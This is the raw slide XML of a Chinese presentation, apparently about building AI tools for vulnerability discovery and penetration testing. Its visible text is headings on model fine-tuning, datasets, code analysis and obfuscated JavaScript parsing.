          <a:xfrm>
            <a:off x="402590" y="3542665"/>
            <a:ext cx="9474200" cy="598170"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="1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圆角矩形 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="402590" y="1844040"/>
            <a:ext cx="9208135" cy="598170"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:lumMod val="1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未来</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规划</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 name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381635" y="1232535"/>
            <a:ext cx="4064000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>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微调</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小模型</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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381635" y="2931160"/>
            <a:ext cx="4064000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>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实战</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经验丰富</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知识库</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 name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381635" y="4629785"/>
            <a:ext cx="4064000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Arial" panose="020B0604020202090204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>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长上下文数据流</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解析</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5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381635" y="1936750"/>
            <a:ext cx="40640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高质量工具调用</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页面推理对话</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数据集</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6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4988560" y="1936750"/>
            <a:ext cx="1810385" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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Qwen 32</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B/14B</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39" name="图片 38"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="4351950" y="1880530"/>
            <a:ext cx="540000" cy="540000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6799240" y="1881165"/>
            <a:ext cx="540000" cy="540000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7595870" y="1936750"/>
            <a:ext cx="1810385" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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SoTa模型</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效果</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425450" y="3607435"/>
            <a:ext cx="40640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安服</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众测</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/SRC/</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白盒漏洞挖掘</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流程</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11" name="图片 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="4268765" y="3525180"/>
            <a:ext cx="540000" cy="540000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5032375" y="3607435"/>
            <a:ext cx="1810385"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场景塑造</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13" name="图片 12"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="6843055" y="3521370"/>
            <a:ext cx="540000" cy="540000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="文本框 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7512685" y="3591560"/>
            <a:ext cx="2741295"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更多</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的深度检测</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思路</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5" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="412115" y="5278120"/>
            <a:ext cx="40640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大规模打包</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混淆</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js</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16" name="图片 15"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="2643165" y="5195865"/>
            <a:ext cx="540000" cy="540000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="文本框 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3348990" y="5278120"/>
            <a:ext cx="2116455"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动</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静态分析</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技术</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0" name="图片 19"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="5259365" y="5188880"/>
            <a:ext cx="540000" cy="540000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="文本框 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5928995" y="5259070"/>
            <a:ext cx="121158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代码</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切片</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2" name="图片 21"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="7056415" y="5189515"/>
            <a:ext cx="540000" cy="540000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="文本框 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7711440" y="5278120"/>
            <a:ext cx="2144395"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长上下文窗口</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模型</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24" name="图片 23"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="9754530" y="5196500"/>
            <a:ext cx="540000" cy="540000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="文本框 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10355580" y="5259070"/>
            <a:ext cx="121158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提取</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API</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786130" y="1953895"/>
            <a:ext cx="6660515" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="7200" b="1" dirty="0">
                <a:ln w="15875">
                  <a:noFill/>
                </a:ln>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="28000">
                      <a:schemeClr val="accent1">
                        <a:lumMod val="5000"/>
                        <a:lumOff val="95000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="88000">
                      <a:srgbClr val="8460D0">
                        <a:alpha val="74000"/>
                      </a:srgbClr>
                    </a:gs>
                    <a:gs pos="60000">
                      <a:schemeClr val="accent1">
                        <a:lumMod val="45000"/>
                        <a:lumOff val="55000"/>
                      </a:schemeClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:latin typeface="腾讯体 W7" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体 W7" panose="020C08030202040F0204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>THANKS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="7200" b="1" dirty="0">
              <a:ln w="15875">
                <a:noFill/>
              </a:ln>
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="28000">
                    <a:schemeClr val="accent1">
                      <a:lumMod val="5000"/>
                      <a:lumOff val="95000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="88000">
                    <a:srgbClr val="8460D0">
                      <a:alpha val="74000"/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="60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8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2827655" y="3521710"/>
            <a:ext cx="2577465" cy="398780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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演讲人</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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TITLE</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4772660" y="1750060"/>
            <a:ext cx="2195195" cy="583565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">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01</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custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4772660" y="2787650"/>
            <a:ext cx="2195195" cy="583565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">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02</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1" name="文本框 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4772660" y="3825240"/>
            <a:ext cx="2195195" cy="583565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">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03</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2" name="文本框 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7092315" y="1750060"/>
            <a:ext cx="4194810" cy="860425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l">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经验</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洞察</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的开发之道</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3" name="文本框 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7092315" y="2787650"/>
            <a:ext cx="3189605" cy="860425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l">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架构为王</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黑盒渗透的实战解决</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方案</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4" name="文本框 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7092315" y="3825240"/>
            <a:ext cx="2849245" cy="860425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l">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细节至上</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小镇做题家的生存智慧</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5" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1908810" y="2449195"/>
            <a:ext cx="2195195" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5400" b="1" i="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目</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5400" b="1" i="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sz="5400" b="1" i="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录</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="5400" b="1" i="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6" name="文本框 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-533400" y="2901315"/>
            <a:ext cx="5306060" cy="1158240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6000" b="1" i="1" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="52000">
                      <a:schemeClr val="accent1">
                        <a:alpha val="32000"/>
                        <a:lumMod val="46000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="5B00B8"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:latin typeface="腾讯体 W7" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体 W7" panose="020C08030202040F0204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CONTENTS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="6000" b="1" i="1" dirty="0">
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="52000">
                    <a:schemeClr val="accent1">
                      <a:alpha val="32000"/>
                      <a:lumMod val="46000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="5B00B8"/>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custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4772660" y="4864735"/>
            <a:ext cx="2195195" cy="583565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">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a:t>
            </a:r>
            <a:r>
              <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4</a:t>
            </a:r>
            <a:endPar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 name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7092315" y="4864735"/>
            <a:ext cx="2849245" cy="860425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pP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未来已来</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打造</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AI+</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网安浪潮的</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掌舵手</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654050" y="2748280"/>
            <a:ext cx="6870065" cy="1414780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <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经验洞察</a:t>
            </a:r>
            <a:endPar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ctr">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <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的开发之道</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1040765" y="1699260"/>
            <a:ext cx="6096000" cy="768350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" algn="ctr">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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01</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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圆角矩形 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="588010" y="4129405"/>
            <a:ext cx="8686800" cy="1950085"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="5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圆角矩形 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="588010" y="1616710"/>
            <a:ext cx="8686800" cy="1796415"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="75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AI</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下半场</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从“有无问题”到“价值</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问题”</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3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1104900" y="2573020"/>
            <a:ext cx="720000" cy="720000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1104900" y="1725295"/>
            <a:ext cx="720000" cy="720000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1104900" y="4271010"/>
            <a:ext cx="720000" cy="720000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1941830" y="1901190"/>
            <a:ext cx="2357755" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>模型算力</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1941830" y="2748915"/>
            <a:ext cx="2357755" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>训练数据</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1941830" y="4446905"/>
            <a:ext cx="2357755" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>架构</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
                <a:ea typeface="腾讯体" panose="020C08030202040F0204" charset="-122"/>
              </a:rPr>
              <a:t>设计</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
